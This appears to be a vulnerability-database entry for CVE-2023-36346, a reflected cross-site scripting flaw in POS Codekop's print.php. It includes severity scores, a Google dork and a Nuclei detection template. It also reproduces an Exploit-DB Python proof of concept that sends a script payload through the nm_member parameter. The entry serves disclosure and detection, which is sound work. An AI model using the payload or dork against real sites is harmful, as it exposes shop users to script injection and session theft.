CVE-2023-36346
Published 2023-06-23

POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.

Priority: P3 (40) | Severity: medium | CVSS 3.1 base score: 6.1
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploit: available
EPSS: 5.29% (91.6th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codekop | codekop | — | — |
No detection rules found.
Exploit-DB
Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
exploitdb · 2023-07-03 · CVSS 6.1
---
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "alert('XSS')"

# requests percent-encodes query parameters itself. Pre-encoding the payload
# with urllib.parse.quote, as the original script did, double-encodes it
# (%27 becomes %2527) so the server never sees the quotes; pass it raw.
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params, timeout=10)
print(response.status_code)
print(response.text)
Nuclei
POS Codekop v2.0 - Cross Site Scripting
nuclei · CVSS 6.1
Template:
id: CVE-2023-36346

info:
  name: POS Codekop v2.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://yuyudhn.github.io/pos-codekop-vulnerability/
    - http://packetstormsecurity.com/files/173280/Sales-Of-Cashier-Goods-1.0-Cross-Site-Scripting.html
    - https://www.youtube.com/watch?v=bbbA-q1syrA